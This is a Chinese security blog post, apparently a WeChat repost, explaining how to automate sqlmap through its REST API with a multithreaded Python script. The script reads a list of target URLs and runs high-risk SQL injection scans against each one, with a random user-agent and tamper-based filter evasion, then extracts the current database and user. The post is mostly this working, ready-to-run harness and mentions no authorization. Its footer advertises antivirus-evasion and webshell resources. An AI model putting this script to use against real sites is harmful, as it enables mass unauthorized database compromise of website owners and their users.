Python调用SqlmapApi实现批量扫描网站
2023-1-17 18:31:31 Author: 渗透安全团队(查看原文) 阅读量:25 收藏


调用sqlmapapi实现批量扫描网站

1、介绍

众所周知,sqlmap是一个非常强大的注入扫描工具。利用它可以自动化检测和利用SQL注入缺陷以达到接管控制网站后台数据库的目的。

但是再强大的工具总会存在一些缺陷的地方——比如每进行一个扫描任务,都需要再次开启一个命令行;使用相同的参数扫描网站时需要多次输入,浪费时间,效率低下。不过好在sqlmap提供了一个强大的api可以弥补这些缺陷。

sqlmapapi分为服务端和客户端,默认端口为8775。使用方法如下:

其中,-p参数可以指定端口号,-s参数是开启服务端,我们只需向sqlmapapi发送请求,就可以进行sql注入扫描,然后发送查询请求,就可以得到url是否存在注入点等其他详细的内容。

查看sqlmap文件中的sqlmapapi.yaml,可以看到使用了哪些函数和方法。

@get("/task/new")

@post("/scan//start")

@get("/scan//stop")

@get("/scan//status")

@get("/scan//data")

@get("/scan//log//")

@get("/scan//kill")

除去这些,还有其他管理函数和核心交互函数会用到。可以参考下面的图片。

但这不是重点,重点是下面的如何通过python代码调用sqlmapapi实现扫描网站的功能。

2、python代码调用sqlmapapi实现扫描功能

首先要先开启sqlmapapi服务端,在命令行中输入python.exe .\sqlmapapi.py -s开启。

使用requests库向/task/new发出get请求,会返回json格式的数据,从中会得到一个随机的taskid,也就是任务id。

向/option/’ + taskId + ‘/set发出post请求,其中带有扫描任务参数(url地址、sqlmap扫描参数等)。

向/scan/’ + taskId + ‘/start发出post请求,开始扫描任务。

向/scan/’ + taskId + ‘/status发出get请求,查看当前任务的扫描状态。

扫描完成后,向/scan/’ + taskId + '/data发出get请求,得到本次扫描的结果数据。

在这几次的请求中,需要提交的数据有data和header,如下:

header = {
        'Content-Type': 'application/json'
    }   
data = {
        'url': url,			//url为要扫描的网站地址
        'batch': True,			//使用默认配置
        'randomAgent': True,			//随机ua头
        'tamper': "space2comment",			//使用给定的脚本进行注入
        'tech': "BEUSTQ",			//使用的 SQL 注入技术
        'threads': 1,			//线程数
        'noCast': True,			//关闭 payload 构造机制
        'timeout': 10,			//超时时间
        'level': 3,			//设置测试等级(1-5)
        'risk': 3,			//设置测试风险等级(1-3)
        'getCurrentDb': True,			//获取当前数据库名
        'getCurrentUser': True,			//获取当前用户名
    }

效果如下:

扫描完成后,结果写入txt文本中,如下:

3、多线程调用sqlmapapi

多线程使用ThreadPoolExecutor,将调用sqlmapapi和向其发出请求写到一个方法中,主函数从“lianjie。txt”中读取要扫描的网站url,在线程池中分别向sqlmapapi发出请求,每一个请求都是独立的任务。当某次的扫描任务完成后,将扫描结果写入“jieguo。txt”中。代码如下:

import os
import requests
import json
from concurrent.futures import ThreadPoolExecutor

def sqlapi(url):
    data = {
        'url': url,
        'batch': True,
        'randomAgent': True,
        'tamper': "space2comment",
        'tech': "BEUSTQ",
        'threads': 1,
        'noCast': True,
        'timeout': 10,
        'level': 3,
        'risk': 3,
        'getCurrentDb': True,
        'getCurrentUser': True,
    }
    header = {
        'Content-Type': 'application/json'
    }
    try:
        task_new_url = "http://127.0.0.1:8775/task/new"
        res = requests.get(task_new_url)
        taskId = res.json()['taskid']
        if 'success' in res.content.decode('utf-8'):
            task_set_url = 'http://127.0.0.1:8775/option/' + taskId + '/set'
            task_set_res = requests.post(task_set_url, data=json.dumps(data), headers=header)
            if 'success' in task_set_res.content.decode('utf-8'):
                task_start_url = 'http://127.0.0.1:8775/scan/' + taskId + '/start'
                task_start_res = requests.post(task_start_url, data=json.dumps(data), headers=header)
                if ('success' in task_start_res.content.decode('utf-8')):
                    while 1:
                        task_status_url = 'http://127.0.0.1:8775/scan/' + taskId + '/status'
                        task_status_res = requests.get(task_status_url)
                        if ('running' in task_status_res.content.decode('utf-8')):
                            print('sqlmap正在运行中......')
                            pass
                        else:
                            task_data_url = 'http://127.0.0.1:8775/scan/' + taskId + '/data'
                            task_data_res = requests.get(task_data_url)
                            f.write("\n" + "检测链接为:" + url + "\n")
                            f.write(task_data_res.content.decode('utf-8'))
                            print("链接:" + url + "检测完成,结果已写入文本中")
                            break
        else:
            print("请检查是否安装sqlmap环境、sqlmapapi是否开启!!!")
            exit()
    except:
        print("请检查是否安装sqlmap环境、sqlmapapi是否开启!!!")
        exit()

if __name__ == '__main__':
    list = []
    try:
        f = open(os.getcwd() + '\\jieguo.txt', 'a+')
        for i in open(os.getcwd() + "\\lianjie.txt", "r").readlines():
            list.append(i)
        with ThreadPoolExecutor(5) as threadsexec:
            for each in list:
                threadsexec.submit(sqlapi, each)
        print("任务已完成!")
    except Exception as ex:
        print(ex)

效果图如下:

https://blog.csdn.net/weixin_43996007/article/details/122195228


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247496313&idx=4&sn=ff0f329849a2fb1b2ab9e5fc6cd01ab1&chksm=c1760fd6f60186c088affd3020f98cc780cc56cd2676a13fe4970dfffff9d4173300435c3dba#rd
如有侵权请联系:admin#unsafe.sh